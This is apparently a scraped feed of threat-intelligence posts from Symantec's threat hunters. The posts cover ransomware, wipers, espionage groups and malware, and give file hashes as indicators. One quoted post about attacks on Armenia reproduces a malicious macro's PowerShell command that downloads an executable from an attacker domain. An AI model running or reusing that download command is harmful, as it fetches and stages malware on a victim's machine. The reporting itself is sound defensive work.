Symantec and Carbon Black's threat hunters bring you the latest threat intelligence from the IT security world.

#NEW - Backdoor.Mistic: New Backdoor May be Linked to #Ransomware Access Broker - New backdoor appears to be linked to #KongTuke, an initial access broker whose #ModeloRAT toolkit has fed #Qilin & other ransomware operations. Read more: security.com/threat-intellig…
1
1
2
1,803
New #wiper malware being used in attacks on #Ukraine 1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591
16
460
1,092
NEW: This is Daxin, the most advanced Chinese espionage tool we've ever found. Used to spy on governments worldwide. symantec-enterprise-blogs.se…
10
311
644
Symantec analysts have confirmed #Petya #ransomware, like #WannaCry, is using #EternalBlue exploit to spread
22
854
443
Breaking news on our SolarWinds investigation. We've found a previously undocumented piece of malware called Raindrop which was used by the attackers against some targets. bit.ly/3p9jaUJ #SolarWinds #Raindrop #Sunburst
4
215
357
Update on #wiper attacks against #ukraine. In some attacks ransomware was also deployed against affected organizations at the same time as the wiper, likely as a decoy or distraction. symantec-enterprise-blogs.se… IOC: 4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382
5
127
195
#WannaCry has code to provide unique bitcoin address for each victim but defaults to hardcoded addresses as a result of race condition bug
6
225
165
New strain of #petya ransomware spreading in Europe. Symantec protects as Ransom.Petya #ransomware
13
290
158
#Petya checks for preexisting infection by looking for its own filename,usually C:\windows\perfc.Creating this file may help as a killswitch
7
221
150
Evidence #WannaCry attackers fixed Bitcoin bug & released variant of malware 13 hours after original; but most infections contain flaw
5
172
140
Interesting detail from our analysis of the decoy ransomware used in #ukraine #wiper attacks. Strings made mocking references to U.S. president Joe Biden.
3
43
110
Chinese facial recognition company left database exposed online cnet.com/news/chinese-facial…
3
102
93
Another wiper attack targeting organizations in Albania by the Iranian Druidfly group. SHA256: 81eb22828306f3197b35fef2035cef2c548f587f8511902852964850023389d7 #wiper #druidfly #iran (1 of 5)
11
25
86
34,393
#Wannacry can't use unique Bitcoin addresses because of bug, meaning attackers cannot track payment. Users unlikely to get files restored
1
122
75
BREAKING: New Symantec research reveals stronger links between #Lazarus and #WannaCry symc.ly/2raFcvI
2
99
71
Our Threat Hunter Team has encountered a new variant of #SiestaGraph, malware that interacts with Microsoft’s Graph API for command and control via Outlook and OneDrive. File hash: fe8f99445ad139160a47b109a8f3291eef9c6a23b4869c48d341380d608ed4cb (1/2)
4
33
69
21,621
Numerous organizations breached in six-year campaign against the energy sector symc.ly/2eJPriJ #dragonfly #infosec
1
107
59
#Petya ransomware outbreak: Here’s what you need to know symc.ly/2thKdTQ #infosec #cybersecurity
4
123
59
Symantec has no evidence of a Wannacry email infection vector and no evidence of a non-killswitch version of the worm. #wannacry #wcry
3
61
63
BREAKING: First evidence #Vault7 tools were used in known cyberattacks. Targets in 16 countries affected. symc.ly/2ogFhM8 #Longhorn
2
118
59
#Spam campaign baits users with #Visa rewards emails that spread #TeslaCrypt #ransomware symc.ly/1WKaH5f
79
25
Chinese APT Group #Cicada (aka #APT10) Widens Targeting in Recent Espionage Activity - gov orgs and NGOs among targets. Read more: symantec-enterprise-blogs.se… #infosec
34
59
THREAD: Latest on #WhisperGate wiper attacks. Thanks to cooperation with the community, we can confirm related samples were being built by actors and possibly deployed to unknown victims as early as October 2021. Other unconfirmed samples may date even earlier. [1/4}
2
28
56
Our Threat Hunter Team has found some evidence that attackers linked to Black Basta may have exploited CVE-2024-26169 as a zero-day prior to patching symantec-enterprise-blogs.se… #ZeroDay #Ransomware #BlackBasta
29
52
26,353
. @Symantec has now blocked 47 million attempted #WannaCry ransomware attacks worldwide. Heat map shows how rapidly the #ransomware spread.
70
51
Symantec uncovers FASTCash malware used by Lazarus group to steal millions from ATMs symc.ly/2zGajkS #LazarusAPT
2
51
43
Hackers hijack WhatsApp and Telegram accounts using security flaws in Signaling System Number 7 (SS7) protocol thenextweb.com/insider/2016/…
1
71
44
Fresh wave of BiBi wiper attacks against Israeli targets this week. Interesting reference in code. #bibwiper (1/2)
2
19
49
12,683
Two new #wannacry variants found: One had modified killswitch. Second has killswitch disabled, but ransomware payload doesn't execute.
2
72
46
#Spring4Shell - what you need to know about this new bug. Read more here: symantec-enterprise-blogs.se…
1
14
43
NEW: If #petya finds certain Norton or Symantec processes running it will not use EternalBlue or EternalRomance to spread
3
49
46
Addicted to #PokemonGO? Protect your device from scams, malware, and privacy issues: symc.ly/29HfpTg
31
35
Our Threat Hunter team has found evidence of updated tooling by the Clubhorn APT group (aka #SideCopy). Recent attack involved modified version of #NightFury backdoor. (1/5)
1
13
42
12,650
Do you want to work in #cybersecurity? Read this advice from 15 women working in the industry symc.ly/2xeetSB #infosec #GHC17
1
34
41
#MobilePrivacy: We tested the top 100 free #Android and #iOS apps. Here's what we found. symc.ly/2MpMeXB
1
36
44
#Cranefly - Threat Actor Uses Previously Unseen Techniques and Tools in Stealthy Campaign symantec-enterprise-blogs.se… #infosec #cybersecurity
29
40
Our Threat Hunter Team has discovered a few more IOCs relating to publicly reported attacks against airport and security targets in Armenia. (Documented here: nitter.app/HaoZhixiang/status/170… and here cyberhub.am/en/blog/2023/09/…) (1 of 5)
APT attacks target Armenia. Attackers forged documents from the National Security Service of the Republic of Armenia,There is vba macro code powershell iwr https://karabakhtelekom[.com/api/ekeng-mta.exe -UsebasicParsing -Outfile C:\users\Public\Downloads\ekeng-mta.exe
1
24
42
20,694
In-browser #cryptocurrency mining makes an unlikely comeback in 2017 but not everyone is happy. Check out our blog and #infographic for more: symc.ly/2Bg5Bh8 #monero #bitcoin #cryptomining
2
94
38
BREAKING: #Sowbug, previously unknown #cyberespionage group targeting South America and Southeast Asia. symc.ly/2Ad9rCF #Infosec
2
62
41
New information on #ukraine #wiper attacks. Exploit of Microsoft SQL Server vulnerability (CVE-2021-1636) was used in at least one attack. symantec-enterprise-blogs.se…
1
23
39
Android.Doublehidden uses several techniques to hide itself on devices, collect info, display ads symc.ly/2jVDOH8
28
42
Hundreds of high-profile Twitter accounts hacked through third-party app gizmodo.com/twitter-accounts…
2
61
34
Destructive #wiper attacks precede Russian invasion of #Ukraine. Here's what we know so far: symantec-enterprise-blogs.se…
19
35
#wannacry attackers not giving up on trying to get payments. New message being sent to victims.
6
82
31
Nemty ransomware now being spread by the Trik botnet. Find out more: symantec.com/blogs/threat-in…
3
18
34
Wannacry victims may be able to recover their files. Further details here: medium.com/threat-intel/wann…
2
47
34
Ongoing campaign targeting IIS servers incl one airline in Middle East. Unknown payload (goopdate32.dll), likely sideloaded. Actor & motive unknown. Similar to reported Seedworm (MuddyWater) activity but low confidence. Also some low confidence links to Damselfly activity(1 of 2)
2
8
37
6,664
. @Symantec has confirmed that #BadRabbit uses the #EternalRomance exploit to spread. Read our updated blog: symc.ly/2gJjEmx
1
61
36
Working in Cyber Security: “The ability to not shy away from challenges goes a long way in this industry” symc.ly/2JYTTHq #infosec #careers #tech
18
34
There’s no “I” in Telegram: Dodgy app looks like legitimate version but with some shady extra features symc.ly/2ANPSAF
3
40
29
What you need to know about the security of voice-activated smart speakers symc.ly/2Ao9v2F
28
32
Sodinokibi: Ransomware Attackers also Scanning for PoS Software, Leveraging Cobalt Strike. Read more: bit.ly/2VoiWfB #ransomware #Sodinokibi
10
26
Symantec uncovers #Leafminer APT targeting government orgs, businesses in the Middle East since 2017 symc.ly/2MNFOOD
50
34
#Tech: The Incredible Hack: Five of the worst on-screen hacking scenes symc.ly/2uOwcil #hacking #infosec
1
32
33
Read our blog to find out how advanced malware #Daxin attempts to evade detection by using communication techniques that can blend in unseen with normal network traffic on a victim network. Learn more: symantec-enterprise-blogs.se… #infosec
1
25
28
REVEALED: Buckeye espionage outfit was using Equation Group tools at least a year prior to the Shadow Brokers leak. Read more: symc.ly/2WuJRoq #apt3 #equation #shadowbrokers
37
32
Malicious #PowerShell attacks increased by 661 percent from the last half of 2017 to the first half of 2018. Read more in our blog: symc.ly/2upagYG
32
31
Symantec uncovered new espionage operations using cloud services and found evidence of further tools in development. Find out more: symantec-enterprise-blogs.se… #CyberEspionage #CloudServices
21
28
7,444
Should you be worried about the new #Meltdown and #Spectre vulnerabilities? Here's what you need to know: symc.ly/2E6O73U
37
29
Patch now! Oracle fixes a record 334 vulnerabilities in July patch update oracle.com/technetwork/secur…
2
41
31
#IoT has been one of the big areas of concern in #cybersecurity in recent times. Read about it in #ISTR17 symc.ly/2ouQsCl
40
27
Malware used in watering hole attacks on Polish banks has tentative links to #Lazarus group symc.ly/2lzHZIU
79
30
. @Symantec has identified the #Orangeworm attack group, which uses the #Kwampirs malware to target large healthcare-related firms in the U.S., Europe, and Asia symc.ly/2K1oJjU
1
39
31
Governments in Asia subjected to ongoing espionage campaign by attackers previously linked to #ShadowPad Trojan. symantec-enterprise-blogs.se… #APT #Cyberespionage
21
24
Meet #Thrip, an espionage group currently targeting satellite communications, telecoms, and defense companies in the U.S. and SE Asia symc.ly/2JQ1ixq
3
41
30
NEW: Symantec finds evidence #Waterbug attackers may have hijacked a separate espionage group’s infrastructure during attack on target in Middle East. symantec.com/blogs/threat-in… #Turla #Crambus #Oilrig
1
28
30
Symantec can confirm that MEDoc software was used to seed initial infections of #petya ransomware
51
29
Nine payments have been made into #Bitcoin wallet associated with #Petya so far #ransomware #infosec
1
43
28
#CyberCrime - Attacks from Malicious IP Hit Multiple Machines in Several Countries link.medium.com/rD2TSjjNr7 #infosec #research
23
27
China-based espionage actor may be moonlighting as RA World ransomware affiliate. Read our blog to find out more. security.com/threat-intellig… #ransomware #apt #plugx
11
30
4,936
North Korean tech freelancers are earning money for authoritarian government msit.go.kr/eng/bbs/view.do;j…
13
26
The A to Z of cyber security: From #BEC scams, to DDoS attacks, and #WannaCry. Read our brief guide to the world of #cybersecurity symc.ly/2CTFoC0
13
25